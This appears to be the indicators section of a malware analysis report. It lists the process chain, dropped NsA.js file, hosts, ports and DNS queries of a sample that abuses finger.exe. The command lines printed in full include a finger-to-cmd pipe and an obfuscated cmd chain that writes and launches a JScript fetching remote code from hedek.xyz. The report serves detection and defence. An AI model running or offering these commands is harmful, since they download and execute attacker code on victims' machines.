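Technical Information
The entries below list process command lines, a file path, remote hosts with their ports, and DNS queries. Two behaviours are the most useful for detection: the output of finger.exe (a connection on TCP port 79) is piped through more.com into cmd.exe, and wscript.exe runs a .js file that the cmd.exe chain writes to %LOCALAPPDATA%.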
- '<SYSTEM32>\finger.exe' ok@croo8y.esfakya.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\NsA.js"
- %LOCALAPPDATA%\nsa.js
- 'cr####.esfakya.xyz':79
- 'be####.hedek.xyz':80
- 'cr####.esfakya.xyz':79
- DNS ASK cr####.esfakya.xyz
- DNS ASK be####.hedek.xyz
- '<SYSTEM32>\cmd.exe' /c finger ok@croo8y.esfakya.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DZDB=.j&&SEt UGYTF=v1xJear1xJe a =1xJe 'sc1xJeri1xJept1xJe:'; b =1xJe 'h1xJeTtP1xJe:'; G1xJeet1xJeObj1xJeec1xJet(1xJea+b+'&&sET 31XY=LWKWYLWKWYbeiie2.hedek.xyzLWKWY?1LWKWY')&&sEt/^p...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p T9P36="%UGYTF:1xJe=%%31XY:LWKWY=/%" 0<nul 1>%LOCALAPPDATA%\NsA%DZDB%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\NsA%DZDB%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\NsA.js